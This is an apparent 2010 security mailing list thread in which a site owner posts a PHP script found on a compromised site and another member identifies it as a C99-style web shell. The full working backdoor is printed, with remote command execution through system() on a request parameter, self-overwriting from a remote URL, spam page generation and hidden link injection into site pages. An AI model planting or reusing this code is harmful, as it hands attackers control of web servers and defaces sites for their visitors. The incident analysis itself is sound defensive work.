Google this tag: <adsttnmq1> which is seen in the code above. This looks to be an older attack that came up around 3/24/09.
On Mon, Mar 1, 2010 at 10:29 AM, Andrew Ellis <[email protected]>wrote: > This is pretty heavily obscured (obviously), but the structure and > some of the things it's doing is reminiscent of PHP Shell, like C99. > > Code like: > function Com() > { > if (isset($_POST['c'])) > @system($_POST['c']); > if (isset($_GET['c'])) > @system($_GET['c']); > } > Is used to pass things through the web-page to the server, allowing > the malicious user to control things more granularly. > > I copied all the code you posted to a server and ran it through php at > the command line. If you add in something like $_POST['c'] = "ls > > test.txt" to the top of the file and run it, you'll find no output on > the page, but a nicely created test.txt file with the contents of the > directory containing this script... > > Sad to say, looks like you were 0wned. > > > > On Mon, Mar 1, 2010 at 3:16 AM, Adrian Crenshaw <[email protected]> > wrote: > > Ok, I think one of my sites may have been compromised. I found the > following > > PHP script on a site, but I'm not sure what it is trying to do. Anyone > else > > ever seen this script before? > > > > Adrian > > > > <?php > > ignore_user_abort(1); > > set_time_limit(0); > > > > function Clear() > > { > > unlink("c"); > > unlink("1r"); > > unlink("log"); > > } > > > > function Clear2() > > { > > $mrd = trim(file_get_contents("m")); > > $pt = "../$mrd"; > > $fin = file_get_contents($pt); > > $fin = ereg_replace("<adsttnmq1>(.*)<sdioyslkjs2>", "", $fin); > > $fin = ereg_replace("<!--dd4-->(.*)<!--dd5-->", "", $fin); > > $fin = preg_replace('#<a[^>]+\_lm[^>]*>.*?</a>#is', '', $fin); > > $fin = preg_replace("/http(.*?)tmp6(.*?)\<\/a\>/", "", $fin); > > $fin = ereg_replace("<!--dd4-->", "", $fin); > > $fin = ereg_replace("<!--dd5-->", "", $fin); > > $fin = ereg_replace("<font style=\"position: absolute;overflow: > > hidden;height: 0;width: 0\">", "", $fin); > > $fmrd = fopen($pt, "w+"); > > fwrite($fmrd, $fin); > > fclose($fmrd); > > echo " upt-ok"; > > } > > > > function GetVar($name, &$var) > > { > > $var = ""; > > if (isset($_POST[$name])) > > $var = $_POST[$name]; > > > > if (isset($_GET[$name])) > > $var = $_GET[$name]; > > > > if (($var) =="") > > return false; > > else return true; > > } > > > > function Gen() > > { > > $alp = "abcdefghiklmnjsweqrtyuiopzx"; > > $maps = array(); > > if (isset($_POST["sg"])) > > $sg = $_POST["sg"]; > > > > if (isset($_GET["sg"])) > > $sg = $_GET["sg"]; > > > > if (isset($_POST["gm"])) > > $g = $_POST["gm"]; > > > > if (isset($_GET["gm"])) > > $g = $_GET["gm"]; > > > > > > $path = ""; > > $fr = fopen("1r", "a+"); > > if (file_exists("c")) > > { > > $fconf = file("c"); > > $tname = trim($fconf[0]); > > $cname = trim($fconf[1]); > > $curs = trim($fconf[2]); > > $pid = trim($fconf[3]); > > if ($pid == 100) > > { > > $pid = 0; > > $rnd = mt_rand(0, 999); > > $nm = ""; > > for ($i=0; $i<3; $i++) > > { > > $ran = mt_rand(0,26); > > $sym = $alp[$ran]; > > $nm = $nm.$sym; > > } > > $cname = $nm; > > mkdir("$tname/$cname"); > > $curs = $g; > > } > > } > > else > > { > > $rnd = mt_rand(0, 999); > > $nm = ""; > > for ($i=0; $i<5; $i++) > > { > > $ran = mt_rand(0,26); > > $sym = $alp[$ran]; > > $nm = $nm.$sym; > > } > > $tname = $nm; > > $pid = 0; > > $curs = $g; > > mkdir($tname); > > $fht = fopen("$tname/.htaccess", "w+"); > > $htname = $sg."2.txt"; > > $fp = fopen($htname, "r"); > > $fin = ''; > > while (!feof($fp)) > > { > > $fc = fgets($fp, 1024); > > if (!$fc) break; > > $fin .= $fc; > > } > > fclose($fp); > > fwrite($fht, $fin); > > fclose($fht); > > $rnd = mt_rand(0, 999); > > $nm = ""; > > for ($i=0; $i<3; $i++) > > { > > $ran = mt_rand(0,26); > > $sym = $alp[$ran]; > > $nm = $nm.$sym; > > } > > $cname = $nm; > > mkdir("$tname/$cname"); > > } > > $gname = $sg."sgen.php"; > > for ($j=$pid; $j<$pid+10; $j++) > > { > > $fp = fopen($gname."?g=$curs", "r"); > > $fin = ''; > > while (!feof($fp)) > > { > > $fc = fgets($fp, 1024); > > if (!$fc) break; > > $fin .= $fc; > > } > > fclose($fp); > > > > $fnd = fopen("$tname/$cname/$curs"."_$j.htm", "w+"); > > fwrite($fnd, $fin); > > fclose($fnd); > > } > > > > if ($j==100) > > { > > $fp = fopen($gname."?g=$curs&m=1", "r"); > > $fin = ''; > > while (!feof($fp)) > > { > > $fc = fgets($fp, 1024); > > if (!$fc) break; > > $fin .= $fc; > > } > > fclose($fp); > > $fnd = fopen("$tname/$cname/$curs"."_lm.htm", "w+"); > > fwrite($fnd, $fin); > > fclose($fnd); > > $map = "$path/$tname/$cname/$curs"."_lm.htm"; > > fwrite($fr,"$map\n"); > > } > > > > $fconf = fopen("c", "w+"); > > fwrite($fconf, $tname."\n"); > > fwrite($fconf, $cname."\n"); > > fwrite($fconf, $curs."\n"); > > $nj = $j; > > fwrite($fconf, $nj."\n"); > > fclose($fconf); > > } > > > > function Update() > > { > > $thisname = "1.php"; > > if (isset($_POST['u'])) > > $u = $_POST['u']; > > > > if (isset($_GET['u'])) > > $u = $_GET['u']; > > > > $fp = fopen($u, "r"); > > $fin = ''; > > while (!feof($fp)) > > { > > $fc = fgets($fp, 1024); > > if (!$fc) break; > > $fin .= $fc; > > } > > fclose($fp); > > > > $fthis = fopen($thisname, "w+"); > > fwrite($fthis, $fin); > > fclose($fthis); > > } > > > > function Com() > > { > > if (isset($_POST['c'])) > > @system($_POST['c']); > > if (isset($_GET['c'])) > > @system($_GET['c']); > > } > > > > function UpKos() > > { > > $mrd = trim(file_get_contents("m")); > > $pt = "../$mrd"; > > $fin = file_get_contents($pt); > > $fin = ereg_replace("adsttnmq1", "<adsttnmq1>", $fin); > > $fin = ereg_replace("sdioyslkjs2", "<sdioyslkjs2>", $fin); > > $fmrd = fopen($pt, "w+"); > > fwrite($fmrd, $fin); > > fclose($fmrd); > > } > > > > > > function MRepl() > > { > > $mpt = ""; > > $drs = ""; > > $begtag = "<adsttnmq1><font style=\"position: absolute;overflow: > > hidden;height: 0;width: 0\">"; > > $endtag = "</font></body></html><sdioyslkjs2> "; > > $mrd = trim(file_get_contents("m")); > > $pt = "../$mrd"; > > $fin = file_get_contents($pt); > > GetVar("mpt", $mpt); > > // óäàëÿåì çàâåðøàþùèå õòìë òåãè > > $fin = preg_replace ("/<\/body>/i", "", $fin); > > $fin = preg_replace ("/<\/html>/i", "", $fin); > > $fin = ereg_replace("<!--dd4-->(.*)<!--dd5-->", "", $fin); > > $fin = ereg_replace("<adsttnmq1>(.*)<sdioyslkjs2>", "", $fin); > > $fp = fopen($mpt, "r"); > > GetVar("drs", $drs); > > $fin = $fin.$begtag; > > $drs = str_replace("\\", "", $drs); > > $fin = $fin.$drs; > > $fin = $fin.$endtag; > > $fmrd = fopen($pt, "w+"); > > fwrite($fmrd, $fin); > > fclose($fmrd); > > } > > > > function Main() > > { > > if (isset($_POST['u']) || isset($_GET['u'])) > > { > > Update(); > > exit(); > > } > > > > if (isset($_POST['c']) || isset($_GET['c'])) > > { > > Com(); > > exit(); > > } > > > > if (isset($_POST['uk']) || isset($_GET['uk'])) > > { > > UpKos(); > > exit(); > > } > > > > if (isset($_POST['g']) || isset($_GET['g'])) > > { > > Gen(); > > exit(); > > } > > > > if (isset($_POST['s']) || isset($_GET['s'])) > > { > > MRepl(); > > exit(); > > } > > > > if (isset($_POST['cl']) || isset($_GET['cl'])) > > { > > Clear(); > > exit(); > > } > > > > if (isset($_POST['cl2']) || isset($_GET['cl2'])) > > { > > Clear2(); > > exit(); > > } > > > > echo "<ok>"; > > > > } > > > > Main(); > > > > ?> > > > > _______________________________________________ > > Pauldotcom mailing list > > [email protected] > > http://mail.pauldotcom.com/cgi-bin/mailman/listinfo/pauldotcom > > Main Web Site: http://pauldotcom.com > > > > > > -- > Andrew Ellis > http://blog.psych0tik.net > _______________________________________________ > Pauldotcom mailing list > [email protected] > http://mail.pauldotcom.com/cgi-bin/mailman/listinfo/pauldotcom > Main Web Site: http://pauldotcom.com >
_______________________________________________ Pauldotcom mailing list [email protected] http://mail.pauldotcom.com/cgi-bin/mailman/listinfo/pauldotcom Main Web Site: http://pauldotcom.com
